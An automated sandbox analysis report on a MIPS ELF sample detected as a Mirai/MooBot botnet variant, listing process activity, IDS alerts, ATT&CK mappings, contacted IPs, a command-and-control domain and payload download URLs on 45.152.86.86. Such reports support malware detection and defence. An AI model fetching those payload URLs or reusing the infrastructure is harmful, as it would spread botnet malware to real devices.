      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/3/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/124/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/124/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/245/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/245/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/1588/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/1588/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/125/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/125/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5430)Queries kernel information via 'uname': Jump to behavior
      Source: b3CaTUFeSZ.elf, 5430.1.0000558aed1fd000.0000558aed284000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mips
      Source: b3CaTUFeSZ.elf, 5430.1.0000558aed1fd000.0000558aed284000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
      Source: b3CaTUFeSZ.elf, 5430.1.00007ffdb7487000.00007ffdb74a8000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
      Source: b3CaTUFeSZ.elf, 5430.1.00007ffdb7487000.00007ffdb74a8000.rw-.sdmpBinary or memory string: fx86_64/usr/bin/qemu-mips/tmp/b3CaTUFeSZ.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/b3CaTUFeSZ.elf

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: b3CaTUFeSZ.elf, type: SAMPLE
      Source: Yara matchFile source: 5430.1.00007f305c400000.00007f305c42b000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
      Source: Yara matchFile source: b3CaTUFeSZ.elf, type: SAMPLE
      Source: Yara matchFile source: 5430.1.00007f305c400000.00007f305c42b000.r-x.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
      OS Credential Dumping
      11
      Security Software Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
      Ingress Tool Transfer
      Scheduled TransferData Encrypted for Impact
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1417888 Sample: b3CaTUFeSZ.elf Startdate: 31/03/2024 Architecture: LINUX Score: 92 27 a.iruko.top 2->27 29 207.86.254.108 XO-AS15US United States 2->29 31 99 other IPs or domains 2->31 33 Snort IDS alert for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 4 other signatures 2->39 9 b3CaTUFeSZ.elf 2->9         started        signatures3 process4 process5 11 b3CaTUFeSZ.elf 9->11         started        process6 13 b3CaTUFeSZ.elf 11->13         started        15 b3CaTUFeSZ.elf 11->15         started        17 b3CaTUFeSZ.elf 11->17         started        process7 19 b3CaTUFeSZ.elf 13->19         started        21 b3CaTUFeSZ.elf 13->21         started        23 b3CaTUFeSZ.elf 13->23         started        25 6 other processes 13->25

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      b3CaTUFeSZ.elf61%ReversingLabsLinux.Trojan.Mirai
      b3CaTUFeSZ.elf51%VirustotalBrowse
      b3CaTUFeSZ.elf100%AviraEXP/ELF.Mirai.Z.A
      No Antivirus matches
      SourceDetectionScannerLabelLink
      a.iruko.top3%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://45.152.86.86/mips;$0%Avira URL Cloudsafe
      http://45.152.86.86/mpsl;100%Avira URL Cloudmalware
      http://45.152.86.86/mips;$0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      a.iruko.top
      45.152.86.86
      truetrueunknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://45.152.86.86/mpsl;b3CaTUFeSZ.elffalse
      • Avira URL Cloud: malware
      unknown
      http://45.152.86.86/mips;$b3CaTUFeSZ.elffalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      23.99.44.48
      unknownUnited States
      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      168.94.117.51
      unknownUnited States
      11596BESTBUYUSfalse
      78.119.70.132
      unknownFrance
      8228CEGETEL-ASFRfalse
      50.100.68.168
      unknownCanada
      603BACOM2-ASCAfalse
      202.236.72.254
      unknownJapan2497IIJInternetInitiativeJapanIncJPfalse
      126.137.24.189
      unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
      40.99.120.50
      unknownUnited States
      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      44.45.68.190
      unknownUnited States
      7377UCSDUSfalse
      205.52.119.42
      unknownUnited States
      2914NTT-COMMUNICATIONS-2914USfalse
      98.181.69.182
      unknownUnited States
      22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
      17.230.30.3
      unknownUnited States
      714APPLE-ENGINEERINGUSfalse
      145.196.169.242
      unknownNetherlands
      1101IP-EEND-ASIP-EENDBVNLfalse
      76.61.33.9
      unknownUnited States
      10796TWC-10796-MIDWESTUSfalse
      45.18.240.40
      unknownUnited States
      7018ATT-INTERNET4USfalse
      92.240.196.95
      unknownRussian Federation
      57129RU-SERVERSGET-KRSKRUfalse
      99.32.231.102
      unknownUnited States
      7018ATT-INTERNET4USfalse
      211.102.3.123
      unknownChina
      23724CHINANET-IDC-BJ-APIDCChinaTelecommunicationsCorporationfalse
      166.172.104.111
      unknownUnited States
      20057ATT-MOBILITY-LLC-AS20057USfalse
      208.61.214.13
      unknownUnited States
      6389BELLSOUTH-NET-BLKUSfalse
      192.27.71.8
      unknownUnited States
      10355DSCGAUSfalse
      87.209.182.249
      unknownNetherlands
      13127VERSATELASfortheTrans-EuropeanTele2IPTransportbackbofalse
      81.28.195.186
      unknownFrance
      24904KWAOOK-NETSARLFRfalse
      211.161.231.192
      unknownChina
      131536SHGWBNNETShanghaiGreatWallBroadbandNetworkServiceCofalse
      27.68.209.68
      unknownViet Nam
      7552VIETEL-AS-APViettelGroupVNfalse
      53.37.18.250
      unknownGermany
      31399DAIMLER-ASITIGNGlobalNetworkDEfalse
      118.137.152.154
      unknownIndonesia
      23700FASTNET-AS-IDLinknet-FastnetASNIDfalse
      111.80.202.202
      unknownTaiwan; Republic of China (ROC)
      2510INFOWEBFUJITSULIMITEDJPfalse
      136.98.129.88
      unknownUnited States
      60311ONEFMCHfalse
      52.235.246.91
      unknownUnited States
      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      107.128.195.171
      unknownUnited States
      7018ATT-INTERNET4USfalse
      207.86.254.108
      unknownUnited States
      2828XO-AS15USfalse
      162.95.46.167
      unknownUnited States
      22089HALLMARKUSfalse
      13.185.114.32
      unknownUnited States
      7018ATT-INTERNET4USfalse
      48.0.159.220
      unknownUnited States
      2686ATGS-MMD-ASUSfalse
      198.122.69.128
      unknownUnited States
      297AS297USfalse
      216.146.73.152
      unknownUnited States
      16399FIRSTCOMM-AS2USfalse
      126.183.10.242
      unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
      81.241.97.164
      unknownBelgium
      5432PROXIMUS-ISP-ASBEfalse
      87.191.20.24
      unknownGermany
      3320DTAGInternetserviceprovideroperationsDEfalse
      78.103.182.86
      unknownNetherlands
      6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
      169.107.76.10
      unknownUnited States
      37611AfrihostZAfalse
      190.185.62.80
      unknownCuracao
      262181CoralTelecomNVSXfalse
      86.64.164.140
      unknownFrance
      15557LDCOMNETFRfalse
      124.225.111.126
      unknownChina
      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
      188.163.68.117
      unknownUkraine
      15895KSNET-ASUAfalse
      106.207.15.232
      unknownIndia
      45609BHARTI-MOBILITY-AS-APBhartiAirtelLtdASforGPRSServicefalse
      208.185.241.56
      unknownUnited States
      396173SWA-W11-MKT-INETUSfalse
      197.104.91.128
      unknownSouth Africa
      37168CELL-CZAfalse
      191.173.186.102
      unknownBrazil
      26615TIMSABRfalse
      165.82.242.221
      unknownUnited States
      3777HAVERFORDUSfalse
      108.114.130.5
      unknownUnited States
      10507SPCSUSfalse
      210.37.80.111
      unknownChina
      4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
      126.219.244.33
      unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
      193.201.58.143
      unknownUnited Kingdom
      5670VI-367-5670USfalse
      112.156.19.163
      unknownKorea Republic of
      17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
      87.1.193.180
      unknownItaly
      3269ASN-IBSNAZITfalse
      182.137.69.63
      unknownChina
      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
      101.252.71.116
      unknownChina
      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
      77.1.141.154
      unknownGermany
      6805TDDE-ASN1DEfalse
      76.150.138.69
      unknownUnited States
      7922COMCAST-7922USfalse
      4.88.188.74
      unknownUnited States
      3356LEVEL3USfalse
      177.92.82.68
      unknownBrazil
      17222MundivoxLTDABRfalse
      145.119.91.124
      unknownNetherlands
      1136KPNKPNNationalEUfalse
      109.129.112.14
      unknownBelgium
      5432PROXIMUS-ISP-ASBEfalse
      103.28.185.102
      unknownChina
      58480CIMBNIAGA-AS-IDPTBankCIMBNiagaTbkIDfalse
      158.194.32.225
      unknownCzech Republic
      2852CESNET2CZfalse
      36.20.185.88
      unknownChina
      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
      90.85.185.131
      unknownFrance
      3215FranceTelecom-OrangeFRfalse
      68.27.26.255
      unknownUnited States
      10507SPCSUSfalse
      140.199.132.68
      unknownUnited States
      26783MARICOPA-COUNTY-COMMUNITY-COLLEGE-DISTRICTUSfalse
      171.101.57.167
      unknownThailand
      17552TRUE-AS-APTrueInternetCoLtdTHfalse
      20.232.88.248
      unknownUnited States
      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      160.106.234.224
      unknownCanada
      715WOODYNET-2USfalse
      97.19.93.109
      unknownUnited States
      22394CELLCOUSfalse
      80.114.90.165
      unknownNetherlands
      33915TNF-ASNLfalse
      19.158.85.165
      unknownUnited States
      3MIT-GATEWAYSUSfalse
      212.46.99.41
      unknownGermany
      12676NCORE-ASHochstadenstr5DEfalse
      119.46.201.194
      unknownThailand
      7470TRUEINTERNET-AS-APTRUEINTERNETCoLtdTHfalse
      24.230.110.231
      unknownUnited States
      11232MIDCO-NETUSfalse
      194.192.133.28
      unknownDenmark
      3292TDCTDCASDKfalse
      184.14.83.10
      unknownUnited States
      7011FRONTIER-AND-CITIZENSUSfalse
      100.218.62.87
      unknownUnited States
      21928T-MOBILE-AS21928USfalse
      44.150.237.119
      unknownUnited States
      62383LDS-ASBEfalse
      49.75.254.167
      unknownChina
      4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
      160.205.178.91
      unknownUnited States
      2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
      107.237.138.252
      unknownUnited States
      20057ATT-MOBILITY-LLC-AS20057USfalse
      48.202.46.165
      unknownUnited States
      2686ATGS-MMD-ASUSfalse
      109.188.108.84
      unknownRussian Federation
      25159SONICDUO-ASRUfalse
      173.141.159.7
      unknownUnited States
      10507SPCSUSfalse
      191.88.231.127
      unknownColombia
      27831ColombiaMovilCOfalse
      221.222.143.30
      unknownChina
      4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
      45.197.185.40
      unknownSeychelles
      328608Africa-on-Cloud-ASZAfalse
      38.128.150.65
      unknownUnited States
      62516ABB-ASNUSfalse
      153.45.47.2
      unknownUnited States
      12928BCVCHfalse
      126.181.52.220
      unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
      32.177.39.236
      unknownUnited States
      20057ATT-MOBILITY-LLC-AS20057USfalse
      190.51.120.245
      unknownArgentina
      22927TelefonicadeArgentinaARfalse
      171.205.191.201
      unknownUnited States
      10794BANKAMERICAUSfalse
      191.219.25.221
      unknownBrazil
      8167BrasilTelecomSA-FilialDistritoFederalBRfalse
      109.102.44.99
      unknownRomania
      9050RTDBucharestRomaniaROfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      192.27.71.820ZCieiwwJ.elfGet hashmaliciousMiraiBrowse
        87.209.182.249DlhUjKPy78Get hashmaliciousMiraiBrowse
          45.18.240.40Hilix.arm7Get hashmaliciousMiraiBrowse
            Hilix.x86Get hashmaliciousMiraiBrowse
              211.161.231.192apep.arm7Get hashmaliciousMiraiBrowse
                202.236.72.254zzVvuiyRQ1Get hashmaliciousMiraiBrowse
                  126.137.24.189apep.x86Get hashmaliciousMiraiBrowse
                    99.32.231.1029aDl048Kv4Get hashmaliciousMiraiBrowse
                      211.102.3.123H3VZPJgTo8Get hashmaliciousMiraiBrowse
                        98.181.69.1823qtOTJupShGet hashmaliciousMiraiBrowse
                          166.172.104.111xTbfuxyUt4.elfGet hashmaliciousMiraiBrowse
                            r6ZMm6XiWcGet hashmaliciousMiraiBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              a.iruko.top7JMZptc2C3.elfGet hashmaliciousMiraiBrowse
                              • 45.154.3.56
                              J8hytxrLBJ.elfGet hashmaliciousMiraiBrowse
                              • 45.154.3.56
                              n5vjWNCONy.elfGet hashmaliciousMiraiBrowse
                              • 45.154.3.56
                              17X18FK24i.elfGet hashmaliciousMiraiBrowse
                              • 45.154.3.56
                              f2XSS2IyI2.elfGet hashmaliciousMiraiBrowse
                              • 45.154.3.56
                              2JJ6n8A6uD.elfGet hashmaliciousMiraiBrowse
                              • 45.154.3.56
                              X4hQbUq5Ib.elfGet hashmaliciousMiraiBrowse
                              • 45.154.3.56
                              HH5LnBFw1p.elfGet hashmaliciousMiraiBrowse
                              • 45.154.3.56
                              rehsc3y8Kc.elfGet hashmaliciousMiraiBrowse
                              • 45.154.3.56
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              BACOM2-ASCAYmHB5jMOsq.elfGet hashmaliciousGafgytBrowse
                              • 50.100.139.145
                              3r6rtLycZS.elfGet hashmaliciousMiraiBrowse
                              • 50.100.21.171
                              iw5WB4OD1w.elfGet hashmaliciousMiraiBrowse
                              • 50.100.21.146
                              pJk7feW3mB.elfGet hashmaliciousMiraiBrowse
                              • 50.100.101.190
                              x86-20230706-1258.elfGet hashmaliciousUnknownBrowse
                              • 50.100.101.196
                              ho76jTHVS2.elfGet hashmaliciousMiraiBrowse
                              • 50.100.11.35
                              DEMONS.x86.elfGet hashmaliciousMiraiBrowse
                              • 50.100.101.186
                              5kMAJNpOu2.elfGet hashmaliciousMiraiBrowse
                              • 50.100.68.172
                              v63K1OYjob.elfGet hashmaliciousMiraiBrowse
                              • 50.100.101.180
                              s5tyniBzuF.elfGet hashmaliciousMiraiBrowse
                              • 50.100.68.150
                              BESTBUYUSSecuriteInfo.com.Trojan.Linux.Mirai.5666.25393.elfGet hashmaliciousMiraiBrowse
                              • 168.94.96.142
                              p8hzfDn0Pn.elfGet hashmaliciousMiraiBrowse
                              • 168.94.142.18
                              Z3eha282zf.elfGet hashmaliciousMirai, MoobotBrowse
                              • 168.94.130.13
                              97OKse8hGO.elfGet hashmaliciousMiraiBrowse
                              • 168.94.117.52
                              226hQk3q7l.elfGet hashmaliciousMiraiBrowse
                              • 167.209.166.124
                              x86.elfGet hashmaliciousUnknownBrowse
                              • 167.209.118.219
                              arm7.elfGet hashmaliciousMiraiBrowse
                              • 168.94.117.60
                              x86.elfGet hashmaliciousUnknownBrowse
                              • 168.94.117.50
                              4E2ggD3VyS.elfGet hashmaliciousMiraiBrowse
                              • 168.94.44.8
                              ER0L6ol4VC.elfGet hashmaliciousMiraiBrowse
                              • 167.209.118.218
                              MICROSOFT-CORP-MSN-AS-BLOCKUSArenaWarSetup.exeGet hashmaliciousStealitBrowse
                              • 40.66.40.211
                              https://xsetlp3sattty7yhmls.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                              • 40.76.134.238
                              https://pub-661b53fed9cd4f549125768c52464fd0.r2.dev/cc2.htmlGet hashmaliciousHTMLPhisherBrowse
                              • 13.107.213.35
                              Hellevator.exeGet hashmaliciousStealitBrowse
                              • 40.66.40.211
                              Hellevator.exeGet hashmaliciousStealitBrowse
                              • 40.66.40.211
                              SecuriteInfo.com.not-a-virus.HEUR.RiskTool.Win32.BitCoinMiner.vho.28481.18891.exeGet hashmaliciousUnknownBrowse
                              • 13.107.213.40
                              Sky-Beta.exeGet hashmaliciousStealitBrowse
                              • 40.66.40.211
                              Sky-Beta.exeGet hashmaliciousStealitBrowse
                              • 40.66.40.211
                              mRRAsfeaJD.elfGet hashmaliciousUnknownBrowse
                              • 52.184.166.108
                              jBYcDlB7fE.elfGet hashmaliciousUnknownBrowse
                              • 51.138.143.95
                              IIJInternetInitiativeJapanIncJPzPg5m2HGZ5.elfGet hashmaliciousMiraiBrowse
                              • 172.123.164.214
                              p8F35SRiO8.elfGet hashmaliciousMiraiBrowse
                              • 160.17.179.66
                              dj4jBpJkg6.elfGet hashmaliciousMiraiBrowse
                              • 131.248.208.202
                              Whj7PiS4fK.elfGet hashmaliciousMirai, OkiruBrowse
                              • 138.107.160.123
                              F7u5JkRhpi.elfGet hashmaliciousMirai, OkiruBrowse
                              • 133.221.189.105
                              IjITuswg7J.elfGet hashmaliciousMirai, MoobotBrowse
                              • 133.143.104.42
                              9fh0epPcJb.elfGet hashmaliciousMiraiBrowse
                              • 133.218.147.39
                              9NdabeH642.elfGet hashmaliciousMirai, MoobotBrowse
                              • 172.122.74.171
                              tOcp0Aywsi.elfGet hashmaliciousMirai, MoobotBrowse
                              • 133.238.224.124
                              bIHCEUuP4x.elfGet hashmaliciousMirai, GafgytBrowse
                              • 150.51.172.203
                              CEGETEL-ASFRN6Cv26YcaB.elfGet hashmaliciousMiraiBrowse
                              • 78.123.210.94
                              WevjzMKrjV.elfGet hashmaliciousMiraiBrowse
                              • 78.119.69.242
                              F7u5JkRhpi.elfGet hashmaliciousMirai, OkiruBrowse
                              • 78.120.190.178
                              vkGOmuEY6o.elfGet hashmaliciousMirai, MoobotBrowse
                              • 78.112.215.215
                              Qpp5L1vHC0.elfGet hashmaliciousUnknownBrowse
                              • 78.115.23.143
                              c9agTsZ4l9.elfGet hashmaliciousMirai, MoobotBrowse
                              • 78.122.64.195
                              KfnswfV92G.elfGet hashmaliciousMiraiBrowse
                              • 213.223.153.54
                              wbUtbKZmxZ.elfGet hashmaliciousMirai, GafgytBrowse
                              • 88.139.140.73
                              PD1Afd15RS.elfGet hashmaliciousMiraiBrowse
                              • 88.141.99.16
                              7yboxvX8mm.elfGet hashmaliciousUnknownBrowse
                              • 78.115.208.218
                              No context
                              No context
                              Process:/tmp/b3CaTUFeSZ.elf
                              File Type:data
                              Category:dropped
                              Size (bytes):20
                              Entropy (8bit):4.1219280948873624
                              Encrypted:false
                              SSDEEP:3:Tg2zp2c3n:Tg25n
                              MD5:993014BE17E428B16B49C08F3E8E8F2A
                              SHA1:D72AD19A5B574AFBADA4C052498DE4472793C6DB
                              SHA-256:92530A8DFEC0B3CFFA248D8CD2EBF13B93E42CB2C743387E21DCA6CA595B9ADA
                              SHA-512:E4BF03BD5A57121EB8195F59087E53F65509E61B9CD3CDA196B8F6C88F569390F6D6FB02B676B5AC1C3E68180D2D31C091F93804D30673128FA73443AB984587
                              Malicious:false
                              Reputation:low
                              Preview:/tmp/b3CaTUFeSZ.elf.
                              Process:/tmp/b3CaTUFeSZ.elf
                              File Type:data
                              Category:dropped
                              Size (bytes):20
                              Entropy (8bit):4.1219280948873624
                              Encrypted:false
                              SSDEEP:3:Tg2zp2c3n:Tg25n
                              MD5:993014BE17E428B16B49C08F3E8E8F2A
                              SHA1:D72AD19A5B574AFBADA4C052498DE4472793C6DB
                              SHA-256:92530A8DFEC0B3CFFA248D8CD2EBF13B93E42CB2C743387E21DCA6CA595B9ADA
                              SHA-512:E4BF03BD5A57121EB8195F59087E53F65509E61B9CD3CDA196B8F6C88F569390F6D6FB02B676B5AC1C3E68180D2D31C091F93804D30673128FA73443AB984587
                              Malicious:false
                              Reputation:low
                              Preview:/tmp/b3CaTUFeSZ.elf.
                              Process:/tmp/b3CaTUFeSZ.elf
                              File Type:data
                              Category:dropped
                              Size (bytes):20
                              Entropy (8bit):4.1219280948873624
                              Encrypted:false
                              SSDEEP:3:Tg2zp2c3n:Tg25n
                              MD5:993014BE17E428B16B49C08F3E8E8F2A
                              SHA1:D72AD19A5B574AFBADA4C052498DE4472793C6DB
                              SHA-256:92530A8DFEC0B3CFFA248D8CD2EBF13B93E42CB2C743387E21DCA6CA595B9ADA
                              SHA-512:E4BF03BD5A57121EB8195F59087E53F65509E61B9CD3CDA196B8F6C88F569390F6D6FB02B676B5AC1C3E68180D2D31C091F93804D30673128FA73443AB984587
                              Malicious:false
                              Reputation:low
                              Preview:/tmp/b3CaTUFeSZ.elf.
                              Process:/tmp/b3CaTUFeSZ.elf
                              File Type:data
                              Category:dropped
                              Size (bytes):20
                              Entropy (8bit):4.1219280948873624
                              Encrypted:false
                              SSDEEP:3:Tg2zp2c3n:Tg25n
                              MD5:993014BE17E428B16B49C08F3E8E8F2A
                              SHA1:D72AD19A5B574AFBADA4C052498DE4472793C6DB
                              SHA-256:92530A8DFEC0B3CFFA248D8CD2EBF13B93E42CB2C743387E21DCA6CA595B9ADA
                              SHA-512:E4BF03BD5A57121EB8195F59087E53F65509E61B9CD3CDA196B8F6C88F569390F6D6FB02B676B5AC1C3E68180D2D31C091F93804D30673128FA73443AB984587
                              Malicious:false
                              Reputation:low
                              Preview:/tmp/b3CaTUFeSZ.elf.
                              Process:/tmp/b3CaTUFeSZ.elf
                              File Type:data
                              Category:dropped
                              Size (bytes):20
                              Entropy (8bit):4.1219280948873624
                              Encrypted:false
                              SSDEEP:3:Tg2zp2c3n:Tg25n
                              MD5:993014BE17E428B16B49C08F3E8E8F2A
                              SHA1:D72AD19A5B574AFBADA4C052498DE4472793C6DB
                              SHA-256:92530A8DFEC0B3CFFA248D8CD2EBF13B93E42CB2C743387E21DCA6CA595B9ADA
                              SHA-512:E4BF03BD5A57121EB8195F59087E53F65509E61B9CD3CDA196B8F6C88F569390F6D6FB02B676B5AC1C3E68180D2D31C091F93804D30673128FA73443AB984587
                              Malicious:false
                              Reputation:low
                              Preview:/tmp/b3CaTUFeSZ.elf.
                              Process:/tmp/b3CaTUFeSZ.elf
                              File Type:data
                              Category:dropped
                              Size (bytes):20
                              Entropy (8bit):4.1219280948873624
                              Encrypted:false
                              SSDEEP:3:Tg2zp2c3n:Tg25n
                              MD5:993014BE17E428B16B49C08F3E8E8F2A
                              SHA1:D72AD19A5B574AFBADA4C052498DE4472793C6DB
                              SHA-256:92530A8DFEC0B3CFFA248D8CD2EBF13B93E42CB2C743387E21DCA6CA595B9ADA
                              SHA-512:E4BF03BD5A57121EB8195F59087E53F65509E61B9CD3CDA196B8F6C88F569390F6D6FB02B676B5AC1C3E68180D2D31C091F93804D30673128FA73443AB984587
                              Malicious:false
                              Reputation:low
                              Preview:/tmp/b3CaTUFeSZ.elf.
                              Process:/tmp/b3CaTUFeSZ.elf
                              File Type:data
                              Category:dropped
                              Size (bytes):20
                              Entropy (8bit):4.1219280948873624
                              Encrypted:false
                              SSDEEP:3:Tg2zp2c3n:Tg25n
                              MD5:993014BE17E428B16B49C08F3E8E8F2A
                              SHA1:D72AD19A5B574AFBADA4C052498DE4472793C6DB
                              SHA-256:92530A8DFEC0B3CFFA248D8CD2EBF13B93E42CB2C743387E21DCA6CA595B9ADA
                              SHA-512:E4BF03BD5A57121EB8195F59087E53F65509E61B9CD3CDA196B8F6C88F569390F6D6FB02B676B5AC1C3E68180D2D31C091F93804D30673128FA73443AB984587
                              Malicious:false
                              Reputation:low
                              Preview:/tmp/b3CaTUFeSZ.elf.
                              Process:/tmp/b3CaTUFeSZ.elf
                              File Type:data
                              Category:dropped
                              Size (bytes):20
                              Entropy (8bit):4.1219280948873624
                              Encrypted:false
                              SSDEEP:3:Tg2zp2c3n:Tg25n
                              MD5:993014BE17E428B16B49C08F3E8E8F2A
                              SHA1:D72AD19A5B574AFBADA4C052498DE4472793C6DB
                              SHA-256:92530A8DFEC0B3CFFA248D8CD2EBF13B93E42CB2C743387E21DCA6CA595B9ADA
                              SHA-512:E4BF03BD5A57121EB8195F59087E53F65509E61B9CD3CDA196B8F6C88F569390F6D6FB02B676B5AC1C3E68180D2D31C091F93804D30673128FA73443AB984587
                              Malicious:false
                              Reputation:low
                              Preview:/tmp/b3CaTUFeSZ.elf.
                              File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                              Entropy (8bit):5.104931767211725
                              TrID:
                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                              File name:b3CaTUFeSZ.elf
                              File size:194'780 bytes
                              MD5:76214a23fd27271b5198fc0cb9325e65
                              SHA1:6ea3dbaf7d6e6649937246a0e08b49f394d20cfb
                              SHA256:51d6a0fe7af5afcb81617782c492947e8d0c9140ef3c24f47791fe5baa2d38e6
                              SHA512:d3dfef7250ec76760721d636019a8ef9b24375040595b8d9cab7e5ad8933b8f2196ccd609d3e957fbe80e71d39f52518c3ee07901edbbd6e95d3b341eb478067
                              SSDEEP:3072:14YIKm5x1fjJkldPjLBGhTv29W+VOtS+YvkVfSRj3t:14+ejJuBGQHISBkVKRzt
                              TLSH:8F14981E6E228F7EF268873047B74E25976D23D627E1D644E1ACC1101F6039E681FFA8
                              File Content Preview:.ELF.....................@.`...4.........4. ...(.............@...@...........................F...F....U....P........dt.Q............................<...'.k\...!'.......................<...'.k8...!... ....'9... ......................<...'.k....!...$....'9q

                              ELF header

                              Class:ELF32
                              Data:2's complement, big endian
                              Version:1 (current)
                              Machine:MIPS R3000
                              Version Number:0x1
                              Type:EXEC (Executable file)
                              OS/ABI:UNIX - System V
                              ABI Version:0
                              Entry Point Address:0x400260
                              Flags:0x1007
                              ELF Header Size:52
                              Program Header Offset:52
                              Program Header Size:32
                              Number of Program Headers:3
                              Section Header Offset:194220
                              Section Header Size:40
                              Number of Section Headers:14
                              Header String Table Index:13
                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                              NULL0x00x00x00x00x0000
                              .initPROGBITS0x4000940x940x8c0x00x6AX004
                              .textPROGBITS0x4001200x1200x270e00x00x6AX0016
                              .finiPROGBITS0x4272000x272000x5c0x00x6AX004
                              .rodataPROGBITS0x4272600x272600x2e640x00x2A0016
                              .ctorsPROGBITS0x46a0c80x2a0c80xc0x00x3WA004
                              .dtorsPROGBITS0x46a0d40x2a0d40x80x00x3WA004
                              .data.rel.roPROGBITS0x46a0e00x2a0e00x1800x00x3WA004
                              .dataPROGBITS0x46a2600x2a2600x49a00x00x3WA0032
                              .gotPROGBITS0x46ec000x2ec000xa480x40x10000003WAp0016
                              .sbssNOBITS0x46f6480x2f6480x500x00x10000003WAp004
                              .bssNOBITS0x46f6a00x2f6480x47780x00x3WA0016
